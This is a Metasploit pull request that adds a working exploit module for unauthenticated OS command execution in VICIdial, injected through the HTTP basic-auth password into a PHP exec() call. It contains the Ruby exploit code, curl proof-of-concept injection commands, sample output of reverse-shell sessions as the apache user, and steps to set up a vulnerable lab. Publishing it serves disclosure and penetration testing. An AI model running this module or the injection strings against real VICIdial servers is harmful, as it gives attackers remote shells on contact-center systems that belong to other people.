### PR TITLE
Add VICIdial user_authorization Unauthenticated Command Execution module

### DIFF
--- a/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md
+++ b/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md
@@ -1,0 +1,133 @@
+## Description
+
+  This module exploits a vulnerability in VICIdial versions 2.9 RC1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default).
+
+  When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to `exec()`.
+
+  This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
+
+
+## Vulnerable Application
+
+  VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well. 
+
+  This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
+
+  Installers:
+
+  * [VICIdial 2.11 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download)
+  * [VICIdial 2.13 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.13rc1.zip/download)
+
+  Follow the [instructions to enabled password encryption](http://vicidial.org/docs/ENCRYPTED_PASSWORDS.txt).
+
+
+## Technical Details
+
+  The `functions.php` file defines a function called `user_authorization`:
+
+  ```php
+  function user_authorization($user,$pass,$user_option,$user_update)
+  ```
+ 
+  This function is used throughout the application to validate user logon credentials supplied using HTTP basic authentication. If password encryption is enabled the user's password is passed to the `pass` argument of the `bp.pl` Perl script, without quotes, using PHP's `exec()` function:
+
+  ```php
+  if ($SSpass_hash_enabled > 0)
+          {
+          if (file_exists("../agc/bp.pl"))
+                  {$pass_hash = exec("../agc/bp.pl --pass=$pass");}
+          else
+                  {$pass_hash = exec("../../agc/bp.pl --pass=$pass");}
+  ```
+
+  A rudimentary blacklist is used to prevent command injection. The apostrophe `'`, quote `"`, semi-colon `;` and backslash `\` characters are removed from the user's username and password using `preg_replace`, like so:
+
+  ```php
+  $user = preg_replace("/\'|\"|\\\\|;/","",$user);
+  $pass = preg_replace("/\'|\"|\\\\|;/","",$pass);
+  ```
+
+  It is trivial to bypass the blacklist.
+
+  For example, backticks ``` ` ```, pipe `|` or ampersand `&` are sufficient to bypass the blacklist and execute arbitrary operating system commands.
+
+  For the purposes of exploitation, reaching the `user_authorization` function call with malicious input is hindered by additional input validation in use prior to the authentication check throughout the majority of the codebase:
+
+  ```php
+  $PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_USER);
+  $PHP_AUTH_PW = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_PW);
+  ```
+
+  However, in VICIdial version 2.11RC2, at least two files did not make use of the additional validation:
+
+  * help.php
+  * vicidial_sales_viewer.php
+
+  In VICIdial version 2.13RC1, at least one file did not make use of the additional validation:
+
+  * vicidial_sales_viewer.php
+
+  This vulnerability was patched in revision 2759.
+
+
+## Proof of Concept
+
+  ```bash
+  $ curl -isk "https://VICIdial.local/vicidial/vicidial_sales_viewer.php" \
+  --user 'anyusername:anypassword& id>/tmp/pwned_by_sales_viewer #'
+  ```
+
+  ```bash
+  $ curl -isk "https://VICIdial.local/vicidial/help.php" \
+  --user 'anyusername:anypassword& id>/tmp/pwned_by_help #'
+  ```
+
+  Note that `/tmp/pwned_by_help` and `/tmp/pwned_by_sales_viewer` files should contain the results of the `id` command.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec`
+  3. Do: `set rhost [IP]`
+  4. Do: `run`
+  5. You should get a session
+
+
+## Sample Output
+
+  ```
+  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
+  [*] 172.16.191.150:80 The target appears to be vulnerable.
+  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [*] 172.16.191.150:80 Sending payload (505 bytes)
+  [+] 172.16.191.150:80 Payload sent successfully
+  [*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.150:36660) at 2017-05-27 01:00:41 -0400
+
+  id
+  uid=48(apache) gid=48(apache) groups=48(apache)
+  ```
+
+
+## Sample Output (Verbose)
+
+  ```
+  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set verbose true
+  verbose => true
+  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
+
+  [*] 172.16.191.150:80 Password encryption is supported, but may not be enabled.
+  [*] 172.16.191.150:80 The target appears to be vulnerable.
+  msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
+
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [*] 172.16.191.150:80 Sending payload (505 bytes)
+  [+] 172.16.191.150:80 Payload sent successfully
+  [*] Command shell session 2 opened (172.16.191.181:4444 -> 172.16.191.150:36661) at 2017-05-27 01:00:48 -0400
+
+  id
+  uid=48(apache) gid=48(apache) groups=48(apache)
+  ```
+

--- a/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb
+++ b/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb
@@ -1,0 +1,112 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'VICIdial user_authorization Unauthenticated Command Execution',
+      'Description'    => %q{
+        This module exploits a vulnerability in VICIdial versions
+        2.9 RC 1 to 2.13 RC1 which allows unauthenticated users
+        to execute arbitrary operating system commands as the web
+        server user if password encryption is enabled (disabled
+        by default).
+
+        When password encryption is enabled the user's password
+        supplied using HTTP basic authentication is used in a call
+        to exec().
+
+        This module has been tested successfully on version 2.11 RC2
+        and 2.13 RC1 on CentOS.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => 'Brendan Coles <bcoles[at]gmail.com>',
+      'References'     =>
+        [
+          ['URL', 'http://www.vicidial.org/VICIDIALmantis/view.php?id=1016']
+        ],
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          # HTTP Basic authentication password
+          'Space' => 2048,
+          # apostrophe ('), quote ("), semi-colon (;) and backslash (\)
+          # are removed by preg_replace
+          'BadChars' => "\x00\x0A\x22\x27\x3B\x5C",
+          'DisableNops' => true,
+          'Compat' =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic perl python netcat'
+            }
+        },
+      'Targets'        => [[ 'Automatic Targeting', {} ]],
+      'Privileged'     => false,
+      'DisclosureDate' => 'May 26 2017',
+      'DefaultTarget'  => 0))
+    register_options([ OptString.new('TARGETURI', [true, 'The base path to VICIdial', '/vicidial/']) ])
+    deregister_options('USERNAME', 'PASSWORD')
+  end
+
+  def check
+    user = rand_text_alpha(rand(10) + 5)
+    pass = "#{rand_text_alpha(rand(10) + 5)}&#"
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'),
+                           'authorization' => basic_auth(user, pass)
+
+    unless res
+      vprint_status 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    if res.code != 401
+      vprint_status "#{peer} Unexpected reply. Expected authentication failure."
+      return CheckCode::Safe
+    end
+
+    # Check for input filtering of '#' and '&' characters in password
+    # Response for invalid credentials is in the form of: |<username>|<password>|BAD|
+    if res.body !~ /\|#{user}\|#{pass}\|BAD\|/
+      vprint_status "#{peer} Target is patched."
+      return CheckCode::Safe
+    end
+
+    # Check for ../agc/bp.pl password encryption script
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '..', 'agc', 'bp.pl')
+    if res && res.code == 200 && res.body =~ /Bcrypt password hashing script/
+      vprint_status "#{peer} Password encryption is supported, but may not be enabled."
+      return CheckCode::Appears
+    end
+
+    vprint_status "#{peer} Could not verify whether password encryption is supported."
+    CheckCode::Detected
+  end
+
+  def execute_command(cmd, opts = {})
+    user = rand_text_alpha(rand(10) + 5)
+    pass = "#{rand_text_alpha(rand(10) + 5)}& #{cmd} #"
+
+    print_status "#{peer} Sending payload (#{cmd.length} bytes)"
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'),
+                           'authorization' => basic_auth(user, pass)
+
+    if !res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    elsif res.code == 401 && res.body =~ /#{user}/ && res.body =~ /BAD/
+      print_good "#{peer} Payload sent successfully"
+    else
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply')
+    end
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+end


### PR DESCRIPTION
This PR adds an exploit for VICIdial.

        This module exploits a vulnerability in VICIdial versions
        2.9 RC 1 to 2.13 RC1 which allows unauthenticated users
        to execute arbitrary operating system commands as the web
        server user if password encryption is enabled (disabled
        by default).

        When password encryption is enabled the user's password
        supplied using HTTP basic authentication is used in a call
        to exec().

        This module has been tested successfully on version 2.11 RC2
        and 2.13 RC1 on CentOS.


## Documentation

To follow; when I feel like it.


## Verification

- [x] Start `msfconsole`
- [x] `use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec`
- [x] `set rhost <RHOST>`
- [x] `check`
- [x] **Verify** something happens
- [x] `run`
- [x] **Verify** you get a shell

### Example Output

```
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
[*] 172.16.191.150:80 The target appears to be vulnerable.
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] 172.16.191.150:80 Sending payload (505 bytes)
[+] 172.16.191.150:80 Payload sent successfully
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.150:36660) at 2017-05-27 01:00:41 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache)
^C
Abort session 1? [y/N]  y

[*] 172.16.191.150 - Command shell session 1 closed.  Reason: User exit
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set verbose true
verbose => true
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check

[*] 172.16.191.150:80 Password encryption is supported, but may not be enabled.
[*] 172.16.191.150:80 The target appears to be vulnerable.
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] 172.16.191.150:80 Sending payload (505 bytes)
[+] 172.16.191.150:80 Payload sent successfully
[*] Command shell session 2 opened (172.16.191.181:4444 -> 172.16.191.150:36661) at 2017-05-27 01:00:48 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache)
^C
Abort session 2? [y/N]  y

[*] 172.16.191.150 - Command shell session 2 closed.  Reason: User exit
```


## Installation

Installation steps for the purposes of reproducing this issue are as follows.

**Source Media**

To ease the burden of setup overhead grab a copy of [goAutoDial LiveCD](http://goautodial.org/attachments/download/3231/goautodial-64bit-ce-3.3-final.iso.html) which includes many of the dependencies including an outdated version of VICIdial.

Boot from the ISO and install.

Update packages. just cos. May not be necessary.

```
$ sudo yum update
```

**Upgrade**

Grab a copy of VICIdial 2.11 RC1 from [Sourceforge](http://sourceforge.net/projects/astguiclient/files/).

```
$ unzip astguiclient_2.11rc1.zip
```

For reference, read but ignore the [instructions](http://vicidial.org/VICIDIALforum/viewtopic.php?f=4&t=34245) to update VICIdial. Instead, the following commands should be sufficient to upgrade.

Firstly, update the database. Ignore the fact that the filename `upgrade_2.10.sql` does not say `2.11`. The VICIdial versioning scheme is off-by-one in some areas just to make life interesting.

```
$ mysql -f --database=asterisk < extras/upgrade_2.10.sql -p   # default MySQL root password is 'vicidialnow'
```

Update VICIdial. Select 'n' and let auto-update do its magic. Run with root privileges because why not.

```
$ perl ./install.pl
```

Reboot the server. just cos.

```
$ reboot
```

Login to the web interface (user: admin; pass: goautodial) and confirm the version is newer (2.11rc1tk).

**Enable Password Encryption**

For reference, review the [instructions for enabling encrypted passwords](http://vicidial.org/docs/ENCRYPTED_PASSWORDS.txt). These instructions are repeated below.

Firstly, install `Crypt::Eksblowfish::Bcrypt`.

```
$ cpan
install Crypt::Eksblowfish::Bcrypt
quit

# The above will likely fail - force install and hope for the best
$ cpan
force install Crypt::Eksblowfish::Bcrypt
quit
```

Test encrypting existing passwords. Note that 0 users are updated.

```
$ /usr/share/astguiclient/ADMIN_bcrypt_convert.pl --debugX --test
```

Run again without `--test`. Passwords for all users should be updated this time.

```
$ /usr/share/astguiclient/ADMIN_bcrypt_convert.pl --debugX
```

Check the MySQL database and ensure password encryption was enabled ('1')

```
$ mysql -h 127.0.0.1 -c asterisk --execute='SELECT pass_hash_enabled FROM `system_settings`'

+-------------------+
| pass_hash_enabled |
+-------------------+
| 1                 |
+-------------------+
```

Run the following PoC to verify the vulnerability:

```
$ curl -isk "https://VICIdial.local/vicidial/vicidial_sales_viewer.php" --user 'anyusername:anypassword& id>/tmp/pwned #'
```

Note that `/tmp/pwned` should contain the results of the `id` command.
